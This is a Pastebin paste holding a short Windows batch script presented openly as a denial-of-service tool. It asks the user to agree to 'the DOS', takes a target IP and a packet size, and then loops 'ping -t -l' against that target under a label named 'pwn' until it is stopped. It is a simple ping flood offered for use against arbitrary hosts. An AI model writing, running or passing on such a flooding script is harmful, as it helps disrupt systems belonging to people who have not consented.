Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @echo off
- echo do you agree to the DOS?
- set /p x=Y or N:
- if %x%==y goto agreed
- if %x%==Y goto agreed
- rem if agreed, continues. else, goes to main menu
- goto main
- :agreed
- cls
- set /p b=ip:
- set /p c=bytes:
- rem assigning amount of bytes/packet to ping with, and the target IP
- cls
- rem confrmation
- echo pinging %b% with %c% bytes per ping
- echo is this correct?
- set /p correct=Y/N:
- rem if correct, continues. otherwise, goes back to input menu.
- if %correct%==Y goto PWN
- if %correct%==y goto PWN
- goto agreed
- :pwn
- cls
- echo press ctrl^c or close program to stop attacking
- rem pings the target using inputted data
- ping -t -l %c% %b%
- goto pwn
Advertisement
Add Comment
Please, Sign In to add comment